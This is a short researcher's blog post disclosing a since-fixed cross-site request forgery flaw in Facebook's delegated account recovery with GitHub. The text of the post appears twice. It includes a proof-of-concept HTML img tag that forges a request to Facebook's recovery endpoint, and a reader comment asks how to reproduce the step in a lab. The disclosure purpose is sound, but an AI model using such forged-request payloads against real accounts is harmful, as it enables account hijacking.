Note this is going to be a quick post.
This year, at Enigma 2017 Conference, Facebook introduced a way to move Account Recovery beyond Email and the "Secret" Question.
After the presentation the moved operationally and presented the first integration partner : Github.
These days I have seen a lot of press around this and both Facebook and Github open sourced their implementation and specification (also presented at F8).
Well it turned out that Facebook side was susceptible to Cross Site Request Forgery.
Really simple explanation:
<html>
<img src="https://www.facebook.com/recovery/delegated/save/?fr=OkpK%2FnF9oZk%3D&relay_token=AfFdhnFYiPWXlcS17dG19Tz4sJT%2B%2FzBorBbDwEKgNMvxUHRIqMAnmmEGrGZlMheUfJdNHv40xyraKOfj64fR7ZgZ8HNNmincyRiHdu6NjuRii0JLZj8YpGx3zHX4XEZlPxfhQyv8LvUKH5%2FpC%2FbkjIv%2Bj80qYCO0bKrF7LAQ0DN0L%2BbPesPzYenAZHxd%2F%2BP74hS0NEEryQTo9vNxKBzaXuCB553yy6%2FmSQqatCL8pgXzduap9VbfP00C8uujARpMVLgUb53i%2F%2BCu%2F0jSzE%2BBrd%2BfvF86cXWX7xpMHLUqrbqduD6COu9GY6%2BdRYkoMC6VcWJVeRa8xBUE3uJ%2BUvu%2FigVuMAYyN1rign%2B9z8RSUScZdkxx4sQt0d7V5v4sOnLU1MVbDq5B3K4ISB7fjISiVyug&ck=3a01be58b48ffde62952b0c6550266a37d1a20bc0dafa9371223a2ff48ff9999&confirmed=1&origin=https%3A%2F%2Fgithub.com%2F&state=https%3A%2F%2Fwww.facebook.com%2Frecovery%2Fdelegated%2Frecover%3Fid%3D2b8ed0985a13287460d3e872ee018ba4">
</html>
Then is enough for the victim to visit asanso.github.io/facebook/test_fb.html and will have a new Github Token of the attack under https://www.facebook.com/settings?tab=security§ion=delegated_account_recovery&view.
You might said: nice but whats the threat here?
Indeed is exactly what Facebook replied. Despite it they fixed the issue adding an additional confirmation page.
For the record the threat here is a Login CSRF to a Github account that is kind of
That's all folks. For more Meh follow me on Twitter.
This year, at Enigma 2017 Conference, Facebook introduced a way to move Account Recovery beyond Email and the "Secret" Question.
After the presentation the moved operationally and presented the first integration partner : Github.
These days I have seen a lot of press around this and both Facebook and Github open sourced their implementation and specification (also presented at F8).
Well it turned out that Facebook side was susceptible to Cross Site Request Forgery.
Really simple explanation:
- The attacker start the integration with Github and stop the flow at the right moment.
- The create an attacker page as https://github.com/asanso/asanso.github.io/blob/master/facebook/test_fb.html
<html>
<img src="https://www.facebook.com/recovery/delegated/save/?fr=OkpK%2FnF9oZk%3D&relay_token=AfFdhnFYiPWXlcS17dG19Tz4sJT%2B%2FzBorBbDwEKgNMvxUHRIqMAnmmEGrGZlMheUfJdNHv40xyraKOfj64fR7ZgZ8HNNmincyRiHdu6NjuRii0JLZj8YpGx3zHX4XEZlPxfhQyv8LvUKH5%2FpC%2FbkjIv%2Bj80qYCO0bKrF7LAQ0DN0L%2BbPesPzYenAZHxd%2F%2BP74hS0NEEryQTo9vNxKBzaXuCB553yy6%2FmSQqatCL8pgXzduap9VbfP00C8uujARpMVLgUb53i%2F%2BCu%2F0jSzE%2BBrd%2BfvF86cXWX7xpMHLUqrbqduD6COu9GY6%2BdRYkoMC6VcWJVeRa8xBUE3uJ%2BUvu%2FigVuMAYyN1rign%2B9z8RSUScZdkxx4sQt0d7V5v4sOnLU1MVbDq5B3K4ISB7fjISiVyug&ck=3a01be58b48ffde62952b0c6550266a37d1a20bc0dafa9371223a2ff48ff9999&confirmed=1&origin=https%3A%2F%2Fgithub.com%2F&state=https%3A%2F%2Fwww.facebook.com%2Frecovery%2Fdelegated%2Frecover%3Fid%3D2b8ed0985a13287460d3e872ee018ba4">
</html>
Then is enough for the victim to visit asanso.github.io/facebook/test_fb.html and will have a new Github Token of the attack under https://www.facebook.com/settings?tab=security§ion=delegated_account_recovery&view.
You might said: nice but whats the threat here?
Indeed is exactly what Facebook replied. Despite it they fixed the issue adding an additional confirmation page.
For the record the threat here is a Login CSRF to a Github account that is kind of
That's all folks. For more Meh follow me on Twitter.
Comments
I'm studdying Oauth and your vulnerabilities/security, and you said "The attacker start the integration with Github and stop the flow at the right moment.", how it is?
I have a lab and i'm trying to simulate this step, i used OWASP ZAP and BurpSuite but with two i received "error proxy" (the configurations in my browser are correct) when i try to log in with test user from facebook.
I have to literally to stop the request, inject my data and forward?
thanks